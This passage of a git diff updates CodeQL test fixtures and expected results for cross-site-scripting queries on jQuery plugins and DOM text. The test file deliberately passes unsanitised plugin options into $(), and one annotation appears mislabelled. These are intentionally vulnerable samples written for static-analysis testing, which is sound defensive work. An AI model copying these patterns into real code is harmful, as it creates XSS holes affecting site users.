unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:36:6:36:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:40:6:40:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:40:6:40:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:48:6:48:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:48:6:48:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... 
\\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:52:6:52:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:52:6:52:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:60:6:60:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:60:6:60:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... ml);\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:90:6:90:6 | t | unsafe-jquery-plugin.js:84:38:84:44 | options | unsafe-jquery-plugin.js:90:6:90:6 | t | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. 
| unsafe-jquery-plugin.js:101:19:108:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... ert\\n\\t\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... lert\\n\\t} | '$.fn.affix' plugin | +| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... lert\\n\\t} | '$.fn.tooltip' plugin | +| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... 
ties\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:170:6:170:11 | target | unsafe-jquery-plugin.js:160:38:160:44 | options | unsafe-jquery-plugin.js:170:6:170:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:160:19:173:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:192:19:192:28 | options.of | unsafe-jquery-plugin.js:185:28:185:34 | options | unsafe-jquery-plugin.js:192:19:192:28 | options.of | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:185:18:194:2 | functio ... et);\\n\\t} | '$.fn.position' plugin | edges | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:3:5:3:11 | options | provenance | | | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:5:5:5:11 | options | provenance | | 
@@ -159,27 +183,3 @@ nodes | unsafe-jquery-plugin.js:186:21:186:30 | options.of | semmle.label | options.of | | unsafe-jquery-plugin.js:192:19:192:28 | options.of | semmle.label | options.of | subpaths -#select -| unsafe-jquery-plugin.js:3:5:3:11 | options | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:3:5:3:11 | options | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:5:5:5:18 | options.target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:5:5:5:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:22:6:22:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:22:6:22:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:30:6:30:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:30:6:30:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:36:6:36:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:36:6:36:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:40:6:40:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:40:6:40:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... 
\\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:48:6:48:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:48:6:48:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:52:6:52:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:52:6:52:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:60:6:60:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:60:6:60:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:90:6:90:6 | t | unsafe-jquery-plugin.js:84:38:84:44 | options | unsafe-jquery-plugin.js:90:6:90:6 | t | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:84:19:93:2 | functio ... 
ns);\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | '$.fn.affix' plugin | -| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... 
T OK\\n\\t} | '$.fn.tooltip' plugin | -| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... NCY]\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:170:6:170:11 | target | unsafe-jquery-plugin.js:160:38:160:44 | options | unsafe-jquery-plugin.js:170:6:170:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:160:19:173:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:179:5:179:18 | options.target | unsafe-jquery-plugin.js:178:27:178:33 | options | unsafe-jquery-plugin.js:179:5:179:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:178:18:180:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:192:19:192:28 | options.of | unsafe-jquery-plugin.js:185:28:185:34 | options | unsafe-jquery-plugin.js:192:19:192:28 | options.of | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:185:18:194:2 | functio ... et);\\n\\t} | '$.fn.position' plugin | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.qlref b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.qlref index 66c19069e074..717ac0c8ff74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.qlref @@ -1 +1,2 @@ -Security/CWE-079/UnsafeJQueryPlugin.ql \ No newline at end of file +query: Security/CWE-079/UnsafeJQueryPlugin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index bda981fe2b7d..315644f407df 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js 
@@ -1,93 +1,93 @@ (function(){ - $.fn.my_plugin = function my_plugin(options) { - $(options); // NOT OK (or is it?) + $.fn.my_plugin = function my_plugin(options) { // $ Source + $(options); // $ Alert - or is it? - $(options.target); // NOT OK + $(options.target); // $ Alert if (isElement(options.target)) { - $(options.target); // OK + $(options.target); } var target = options.target; if (isElement(target)) { - $(target); // OK + $(target); } if (typeof target != "string") { - $(target); // OK + $(target); } if (target.jquery === undefined) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery !== undefined) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery !== "undefined") { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery === "undefined") { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (!target.jquery) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (!!target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } }; - $.fn.my_plugin = function my_plugin(element, options) { + $.fn.my_plugin = function my_plugin(element, options) { // $ Source this.$element = $(element); this.options = $.extend({}, options); - if (this.options.parent) this.$parent = $(this.options.parent) // NOT OK + if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; - $.fn.my_plugin = function my_plugin(options) { - $(options.foo.bar.baz); // NOT OK - $(options.html); // OK + $.fn.my_plugin = function my_plugin(options) { // $ Source + $(options.foo.bar.baz); // $ Alert + $(options.html); }; - $.fn.my_plugin = function my_plugin(options) { 
- $(x).appendTo(options.foo.bar.baz); // NOT OK + $.fn.my_plugin = function my_plugin(options) { // $ Source + $(x).appendTo(options.foo.bar.baz); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $("#" + options.target); // OK + $("#" + options.target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source function f(o) { this.o = $.extend({}, o); var t = this.o.target; console.log(t); - $(t); // NOT OK + $(t); // $ Alert } f(options); }; @@ -95,79 +95,79 @@ $.fn.my_plugin = function my_plugin(options) { var target = options.target; if (safe.has(target)) - $(target); // OK + $(target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({ menu: '
    ', target: '.my_plugin' }, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; $.fn.my_plugin.defaults = { menu: '
    ', target: '.my_plugin' }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({}, $.fn.my_plugin.defaults, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; var pluginName = "my_plugin"; - $.fn[pluginName] = function my_plugin(options) { - $(options.target); // NOT OK + $.fn[pluginName] = function my_plugin(options) { // $ Source + $(options.target); // $ Alert }; $.extend($.fn, { - my_plugin: function my_plugin(options) { - $(options.target); // NOT OK + my_plugin: function my_plugin(options) { // $ Source + $(options.target); // $ Alert } }); - $.fn.affix = function my_plugin(options) { - $(options.target); // NOT OK + $.fn.affix = function my_plugin(options) { // $ Source + $(options.target); // $ Alert }; - $.fn.tooltip = function my_plugin(options) { - $(options.viewport.selector); // NOT OK + $.fn.tooltip = function my_plugin(options) { // $ Source + $(options.viewport.selector); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { let intentional1 = options.target || `
    hello
    `; - $(intentional1); // OK + $(intentional1); let intentional2 = `
    ${options.target}
    `; - $(intentional2); // OK + $(intentional2); let intentional3 = `
    ` + options.target `
    `; - $(intentional3); // OK + $(intentional3); let unintentional = `
    `; $(unintentional); // OK - but should be flagged by another query } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source let target = options.target; - target === DEFAULTS.target? $(target): $(document).find(target); // OK - options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); // OK - options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // OK - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties [INCONSISTENCY] + target === DEFAULTS.target? $(target): $(document).find(target); + options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); + options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } - $.fn.my_plugin = function my_plugin(options) { - $(anyPrefix + options.target); // OK (unlikely to be a html/css prefix confusion) + $.fn.my_plugin = function my_plugin(options) { // $ Source + $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion - $(something.replace("%PLACEHOLDER%", options.target)); // OK (unlikely to be a html/css prefix confusion); + $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); let target = options.target; if (target.foo) { - $(target); // OK (unlikely to be a string) + $(target); // OK - unlikely to be a string } if (target.length) { - $(target); // NOT OK (can still be a string) + $(target); // $ Alert - can still be a string } } 
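Review bot: On the line `options.targets.a === DEFAULTS.target? $(options.target.a): ...` the guard reads `options.targets.a` while the sink uses `options.target.a`, so the comparison does not constrain the value that reaches `$()`. The `SPURIOUS: Alert` label therefore looks misattributed, because an alert would be expected here however `AccessPath` treats nested properties. If the case is meant to exercise `MembershipTestSanitizer`, the guard should read `options.target.a === DEFAULTS.target`; otherwise the annotation should be a plain `// $ Alert`. The removed line has the same mismatch, so it predates this change.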
@@ -175,28 +175,28 @@ function setupPlugin(o) { $.fn.my_plugin = o.f } - setupPlugin({f: function(options) { - $(options.target); // NOT OK + setupPlugin({f: function(options) { // $ Source + $(options.target); // $ Alert }}); setupPlugin({f:function(options) { - $(document).find(options.target); // OK + $(document).find(options.target); }}); - $.fn.position = function( options ) { + $.fn.position = function( options ) { // $ Source if ( !options || !options.of ) { return doSomethingElse( this, arguments ); } // extending options options = $.extend( {}, options ); - var target = $( options.of ); // NOT OK + var target = $( options.of ); // $ Alert console.log(target); }; $.fn.blockReceiver = function( options ) { $.extend({ foo() { - $(this); // OK + $(this); } }, options, diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql deleted file mode 100644 index 547763a8f838..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql +++ /dev/null @@ -1,14 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.XssThroughDomQuery - -deprecated class ConsistencyConfig extends ConsistencyConfiguration { - ConsistencyConfig() { this = "ConsistencyConfig" } - - override DataFlow::Node getAnAlert() { - exists(DataFlow::Node source | - XssThroughDomFlow::flow(source, result) and - not isIgnoredSourceSinkPair(source, result) - ) - } -} 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.expected b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.expected index 1b53311a3d69..6f2eed5b1393 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/XssThroughDom.expected 
@@ -1,3 +1,52 @@ +#select +| angular.ts:16:24:16:41 | event.target.value | angular.ts:16:24:16:41 | event.target.value | angular.ts:16:24:16:41 | event.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:16:24:16:41 | event.target.value | DOM text | +| angular.ts:20:24:20:35 | target.value | angular.ts:20:24:20:35 | target.value | angular.ts:20:24:20:35 | target.value | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:20:24:20:35 | target.value | DOM text | +| angular.ts:29:24:29:37 | form.value.foo | angular.ts:29:24:29:33 | form.value | angular.ts:29:24:29:37 | form.value.foo | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:29:24:29:33 | form.value | DOM text | +| angular.ts:33:24:33:33 | this.field | angular.ts:12:5:12:23 | field: string = ""; | angular.ts:33:24:33:33 | this.field | $@ is reinterpreted as HTML without escaping meta-characters. | angular.ts:12:5:12:23 | field: string = ""; | DOM text | +| forms.js:9:31:9:40 | values.foo | forms.js:8:23:8:28 | values | forms.js:9:31:9:40 | values.foo | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:8:23:8:28 | values | DOM text | +| forms.js:12:31:12:40 | values.bar | forms.js:11:24:11:29 | values | forms.js:12:31:12:40 | values.bar | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:11:24:11:29 | values | DOM text | +| forms.js:25:23:25:34 | values.email | forms.js:24:15:24:20 | values | forms.js:25:23:25:34 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:24:15:24:20 | values | DOM text | +| forms.js:29:23:29:34 | values.email | forms.js:28:20:28:25 | values | forms.js:29:23:29:34 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. 
| forms.js:28:20:28:25 | values | DOM text | +| forms.js:35:19:35:30 | values.email | forms.js:34:13:34:18 | values | forms.js:35:19:35:30 | values.email | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:34:13:34:18 | values | DOM text | +| forms.js:45:21:45:33 | values.stooge | forms.js:44:21:44:26 | values | forms.js:45:21:45:33 | values.stooge | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:44:21:44:26 | values | DOM text | +| forms.js:57:19:57:32 | e.target.value | forms.js:57:19:57:32 | e.target.value | forms.js:57:19:57:32 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:57:19:57:32 | e.target.value | DOM text | +| forms.js:72:19:72:27 | data.name | forms.js:71:21:71:24 | data | forms.js:72:19:72:27 | data.name | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:71:21:71:24 | data | DOM text | +| forms.js:93:25:93:35 | values.name | forms.js:92:26:92:36 | getValues() | forms.js:93:25:93:35 | values.name | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:92:26:92:36 | getValues() | DOM text | +| forms.js:103:23:103:36 | e.target.value | forms.js:103:23:103:36 | e.target.value | forms.js:103:23:103:36 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:103:23:103:36 | e.target.value | DOM text | +| forms.js:107:23:107:36 | e.target.value | forms.js:107:23:107:36 | e.target.value | forms.js:107:23:107:36 | e.target.value | $@ is reinterpreted as HTML without escaping meta-characters. | forms.js:107:23:107:36 | e.target.value | DOM text | +| xss-through-dom.js:2:16:2:34 | $("textarea").val() | xss-through-dom.js:2:16:2:34 | $("textarea").val() | xss-through-dom.js:2:16:2:34 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:2:16:2:34 | $("textarea").val() | DOM text | +| xss-through-dom.js:4:16:4:40 | $(".som ... 
.text() | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:4:16:4:40 | $(".som ... .text() | DOM text | +| xss-through-dom.js:8:16:8:53 | $(".som ... arget") | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:8:16:8:53 | $(".som ... arget") | DOM text | +| xss-through-dom.js:11:3:11:42 | documen ... nerText | xss-through-dom.js:11:3:11:42 | documen ... nerText | xss-through-dom.js:11:3:11:42 | documen ... nerText | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:11:3:11:42 | documen ... nerText | DOM text | +| xss-through-dom.js:19:3:19:44 | documen ... Content | xss-through-dom.js:19:3:19:44 | documen ... Content | xss-through-dom.js:19:3:19:44 | documen ... Content | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:19:3:19:44 | documen ... Content | DOM text | +| xss-through-dom.js:23:3:23:48 | documen ... ].value | xss-through-dom.js:23:3:23:48 | documen ... ].value | xss-through-dom.js:23:3:23:48 | documen ... ].value | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:23:3:23:48 | documen ... ].value | DOM text | +| xss-through-dom.js:27:3:27:61 | documen ... arget') | xss-through-dom.js:27:3:27:61 | documen ... arget') | xss-through-dom.js:27:3:27:61 | documen ... arget') | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:27:3:27:61 | documen ... arget') | DOM text | +| xss-through-dom.js:51:30:51:48 | $("textarea").val() | xss-through-dom.js:51:30:51:48 | $("textarea").val() | xss-through-dom.js:51:30:51:48 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. 
| xss-through-dom.js:51:30:51:48 | $("textarea").val() | DOM text | +| xss-through-dom.js:54:31:54:49 | $("textarea").val() | xss-through-dom.js:54:31:54:49 | $("textarea").val() | xss-through-dom.js:54:31:54:49 | $("textarea").val() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:54:31:54:49 | $("textarea").val() | DOM text | +| xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:56:30:56:51 | $("inpu ... 0).name | DOM text | +| xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:57:30:57:67 | $("inpu ... "name") | DOM text | +| xss-through-dom.js:61:30:61:69 | $(docum ... value") | xss-through-dom.js:61:30:61:69 | $(docum ... value") | xss-through-dom.js:61:30:61:69 | $(docum ... value") | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:61:30:61:69 | $(docum ... value") | DOM text | +| xss-through-dom.js:64:30:64:40 | valMethod() | xss-through-dom.js:64:30:64:40 | valMethod() | xss-through-dom.js:64:30:64:40 | valMethod() | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:64:30:64:40 | valMethod() | DOM text | +| xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | xss-through-dom.js:71:11:71:32 | $("inpu ... 0).name | $@ is reinterpreted as HTML without escaping meta-characters. | xss-through-dom.js:71:11:71:32 | 